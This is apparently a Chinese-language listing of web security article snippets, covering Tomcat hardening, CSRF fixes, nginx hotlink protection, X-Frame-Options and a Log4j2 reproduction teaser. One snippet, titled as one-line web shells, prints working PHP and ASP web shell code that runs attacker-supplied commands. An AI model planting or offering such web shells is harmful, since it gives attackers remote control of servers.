WEB应用常见的安全漏洞及解决方案...
WEB应用常见的安全漏洞及解决方案
后端 安全

第一步:修改应用程序的web.xml文件的协议<?xml version="1.0" encoding="UTF-8"?> <web-app xmlns="http://java...
tomcat wedav 禁止DELETE、PUT、OPTIONS、TRACE、HEAD等协议访问应用程序应用程序
后端 中间件 安全 tomcat

简介ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。漏洞概述该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通...
手把手教你复现Log4j2漏洞,千万别中招!
后端 安全 java

php<?php echo shell_exec($_GET['cmd']);?>asp<%execute(request("value"))%>aspx<%@ Pag...
一句话木马
后端 安全

解决方法: Cookies Hashing:每一个表单请求中都加入随机的Cookie,由于网站中存在XSS漏洞而被偷窃的危险。在Jsp文件头引入<%@ page import="com.zxl...
没有CSRF保护的HTML表单-漏洞解决办法
后端 安全

关于nginx防盗链的方法网上有很多教程,都可以用,但是我发现很多教程并不完整,所做的防盗链并不是真正的彻底的防盗链!一般,我们做好防盗链之后其他网站盗链的本站图片就会全部失效无法显示,但是您如果通...
nginx系统真正有效的图片防盗链完整设置详解
后端 中间件 安全 nginx

tomcat目录/conf/web.xml中的搜索httpHeaderSecurity配置(低版本不支持,需Tomcat 7.0.69以上),将其前面的注释去掉即可。<filter-mappi...
Tomcat 配置“X-Frame-Options头”
后端 中间件 安全 tomcat

一、压缩你的class类文件为jar包 1.假设你的需要压缩的类文件存在的包为:cn.mbq.test1和cn.mbq.test2 2.进入你的classes目录(这里是在MyEclipse平台里建...
applet签名
后端 安全 java